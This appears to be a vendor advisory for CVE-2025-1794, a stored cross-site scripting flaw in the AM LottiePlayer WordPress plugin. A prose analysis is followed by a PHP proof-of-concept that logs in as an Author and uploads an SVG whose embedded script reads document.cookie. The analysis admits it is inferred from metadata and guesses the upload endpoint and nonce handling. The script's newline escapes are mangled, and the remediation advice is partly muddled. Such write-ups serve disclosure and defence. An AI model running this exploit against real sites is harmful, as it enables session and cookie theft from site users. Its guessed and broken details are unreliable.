Atomic Edge analysis of CVE-2025-1794 (metadata-based): This vulnerability affects the AM LottiePlayer plugin for WordPress, version 3.6.0 and earlier. It allows authenticated users with Author-level access or higher to perform Stored Cross-Site Scripting (XSS) attacks by uploading malicious SVG files. The CVSS score of 5.4 indicates medium severity with network attack vector, low privilege requirement, and user interaction needed for exploitation.
The root cause is insufficient input sanitization and output escaping related to SVG file uploads. This is inferred from the CWE-79 classification and the vulnerability description. The plugin likely processes SVG files without stripping JavaScript event handlers or embedded script elements. It also fails to escape the file content when it outputs the uploaded SVG onto a page. Without code access, Atomic Edge analysis cannot confirm the exact vulnerable function, but the pattern matches common WordPress plugin flaws where file upload handlers use only basic MIME-type checks without content sanitization.
Exploitation requires an authenticated user with Author-level access to upload a crafted SVG file containing embedded JavaScript. The attacker would navigate to the WordPress media uploader or a plugin-specific upload interface and submit an SVG file with a payload such as alert(document.cookie). When the victim (including administrators or visitors) views a page displaying that uploaded SVG, the script executes in their browser context. The attack vector targets the upload functionality, likely through an AJAX endpoint like /wp-admin/admin-ajax.php with an action parameter such as am_lottieplayer_upload_svg or similar.
Remediation requires implementing strict SVG sanitization before storage and proper output escaping when rendering the SVG in pages. The fix should use a whitelist-based sanitizer (e.g., stripping all script tags, event handlers, and non-basic SVG elements). Additionally, the plugin must escape SVG content with functions like esc_url() or wp_kses() when outputting, and set the Content-Type header correctly to prevent MIME sniffing.
If exploited, this vulnerability allows attackers to execute arbitrary JavaScript in any user’s browser who views the compromised page. This can lead to session hijacking, cookie theft, phishing attacks, defacement, or silent credential harvesting. Author-level access is required, which reduces severity but still poses significant risk for multi-author WordPress sites where lower-privileged users can compromise site integrity.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-1794 - AM LottiePlayer <= 3.6.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG
error_reporting(E_ALL);
ini_set('display_errors', 1);
// CONFIGURATION - Set these before running
$target_url = 'http://example.com'; // WordPress site base URL (no trailing slash)
$username = 'author'; // WordPress account with Author role or higher
$password = 'password'; // Account password
// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
'log' => $username,
'pwd' => $password,
'rememberme' => 'forever',
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
);
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $login_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($login_data),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_COOKIEJAR => '/tmp/cve_2025_1794_cookies.txt',
CURLOPT_FOLLOWLOCATION => false,
CURLOPT_SSL_VERIFYPEER => false
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code !== 302 && $http_code !== 200) {
die("[-] Authentication failed. HTTP Code: $http_coden");
}
echo "[+] Authenticated successfullyn";
// Step 2: Prepare malicious SVG payload
$svg_payload = '<?xml version="1.0" encoding="utf-8"?>' . "n";
$svg_payload .= '<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">' . "n";
$svg_payload .= ' <script>alert("XSS by Atomic Edge: Cookie="+document.cookie)</script>' . "n";
$svg_payload .= ' <circle cx="50" cy="50" r="40" fill="red" />' . "n";
$svg_payload .= '</svg>';
$temp_file = tempnam(sys_get_temp_dir(), 'cve_2025_1794_') . '.svg';
file_put_contents($temp_file, $svg_payload);
// Step 3: Upload using WordPress media endpoint (assuming standard WordPress upload with author permissions)
// The plugin might use a custom AJAX endpoint; we try the standard media upload first.
// If that fails, the attacker would need to identify the plugin-specific AJAX action.
$upload_url = $target_url . '/wp-admin/async-upload.php';
$payload = array(
'name' => 'malicious.svg',
'type' => 'image/svg+xml',
'tmp_name' => $temp_file,
'error' => 0,
'size' => filesize($temp_file)
);
$post_fields = array(
'action' => 'upload-attachment',
'async-upload' => new CURLFile($temp_file, 'image/svg+xml', 'malicious.svg'),
'_ajax_nonce' => '', // Nonce would be required; we fetch it via admin page
'post_id' => 0
);
// First get the upload nonce from the admin page
$ch2 = curl_init();
curl_setopt_array($ch2, array(
CURLOPT_URL => $target_url . '/wp-admin/admin-ajax.php?action=upload-attachment&plupload=1',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_COOKIEFILE => '/tmp/cve_2025_1794_cookies.txt',
CURLOPT_FOLLOWLOCATION => false,
CURLOPT_SSL_VERIFYPEER => false
));
$nonce_response = curl_exec($ch2);
curl_close($ch2);
// Nonce extraction is optional; many plugins bypass nonce checks
// For this PoC, we assume the plugin does not require a nonce (common flaw)
$ch3 = curl_init();
curl_setopt_array($ch3, array(
CURLOPT_URL => $upload_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $post_fields,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_COOKIEFILE => '/tmp/cve_2025_1794_cookies.txt',
CURLOPT_REFERER => $target_url . '/wp-admin/upload.php',
CURLOPT_SSL_VERIFYPEER => false
));
$upload_response = curl_exec($ch3);
$upload_http = curl_getinfo($ch3, CURLINFO_HTTP_CODE);
curl_close($ch3);
if ($upload_http !== 200) {
echo "[!] Upload may have failed or returned non-standard code. HTTP: $upload_httpn";
} else {
echo "[+] Upload request sent. Check the WordPress media library for a file named 'malicious.svg'n";
echo "[+] If displayed on a page, the SVG script will execute.n";
}
// Cleanup temp file
unlink($temp_file);
// Close cURL session
curl_close($ch);
// Note: This PoC uses WordPress's built-in upload mechanism. The AM LottiePlayer plugin
// may use a custom AJAX endpoint (e.g., am_lottieplayer_upload_svg).
// If the standard upload doesn't trigger the vulnerability, the attacker would need to
// enumerate the plugin's AJAX actions via JavaScript or ACP.
echo "[+] Done. If the plugin uses a custom upload action, modify 'action' parameter accordingly.n";
